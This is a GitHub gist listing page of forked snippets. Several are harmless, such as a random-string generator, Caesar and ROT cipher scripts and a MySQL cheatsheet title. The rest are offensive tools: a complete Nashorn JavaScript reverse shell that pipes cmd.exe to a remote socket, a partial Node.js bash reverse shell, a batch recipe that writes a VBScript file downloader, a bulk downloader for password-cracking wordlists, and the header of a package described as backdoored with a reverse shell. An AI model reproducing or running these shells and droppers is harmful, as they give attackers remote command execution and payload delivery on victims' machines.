Skip to content

Instantly share code, notes, and snippets.

View Ch4p34uN0iR's full-sized avatar

Ch4p34U N0iR Ch4p34uN0iR

View GitHub Profile
@Ch4p34uN0iR
Ch4p34uN0iR / bash.generate.random.alphanumeric.string.sh
Created September 22, 2017 21:06 — forked from earthgecko/bash.generate.random.alphanumeric.string.sh
shell/bash generate random alphanumeric string
#!/bin/bash
# bash generate random alphanumeric string
#
# bash generate random 32 character alphanumeric string (upper and lowercase) and
NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
# bash generate random 32 character alphanumeric string (lowercase only)
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1
@Ch4p34uN0iR
Ch4p34uN0iR / caesar-cipher.sh
Created October 9, 2017 03:27 — forked from IQAndreas/caesar-cipher.sh
A really simple Caesar Cipher in Bash (or Shell) using `tr`, can also easily be adjusted to encrypt/decrypt ROT13 instead.
# Caesar cipher encoding
echo "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" | tr '[A-Z]' '[X-ZA-W]'
# output: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD
# Caesar cipher decoding
echo "QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD" | tr '[X-ZA-W]' '[A-Z]'
# output: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
# Can also be adjusted to ROT13 instead
@Ch4p34uN0iR
Ch4p34uN0iR / rot.sh
Created October 9, 2017 08:34 — forked from 75th/rot.sh
A Bash script for Caesar ciphers. I needed (well, wanted) a tool to do ROT-n ciphers for arbitrary n. So here it is. If n is not provided, it defaults to ROT-13. No ROT-5 for numerals as yet. This is my first shell script for public consumption; feedback is eagerly welcome, but please be gentle.
#! /bin/bash
# Usage: rot [base] string
#
# Base is assumed to be 13 if not specified.
#
# Bases not in 0-25 are taken modulo 26; negatives are increased by
# 26es until they're positive. Thus, any integer should work
# as expected.
@Ch4p34uN0iR
Ch4p34uN0iR / README.md
Created October 28, 2017 19:37 — forked from hofmannsven/README.md
My simply MySQL Command Line Cheatsheet
@Ch4p34uN0iR
Ch4p34uN0iR / MyPackage.opm
Created October 30, 2017 21:09 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
@Ch4p34uN0iR
Ch4p34uN0iR / wget_vbs
Created November 9, 2017 03:19 — forked from sckalath/wget_vbs
wget vbscript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
@Ch4p34uN0iR
Ch4p34uN0iR / wordlist.sh
Created November 9, 2017 21:43 — forked from omarkurt/wordlist.sh
packetstromsecurity all wordlist
#!/bin/bash
#Script by OliverK
#Downloads _every_ wordlist in the packet storm security site.
#April 18th, 2011
# Updated Oct , 2th, 2012
mkdir common
cd common
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2
@Ch4p34uN0iR
Ch4p34uN0iR / revsh.js
Created November 11, 2017 19:22 — forked from frohoff/revsh.js
Nashorn Javascript Reverse Shell
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@Ch4p34uN0iR
Ch4p34uN0iR / reverse_shell.js
Created November 11, 2017 19:53
reverse shell
var spawn = require('child_process').spawn;
var net = require('net');
var reconnect = require('reconnect');
reconnect(function (stream) {
var ps = spawn('bash', [ '-i' ]);
stream.pipe(ps.stdin);
ps.stdout.pipe(stream, { end: false });
ps.stderr.pipe(stream, { end: false });
ps.on('exit', function () { stream.end() });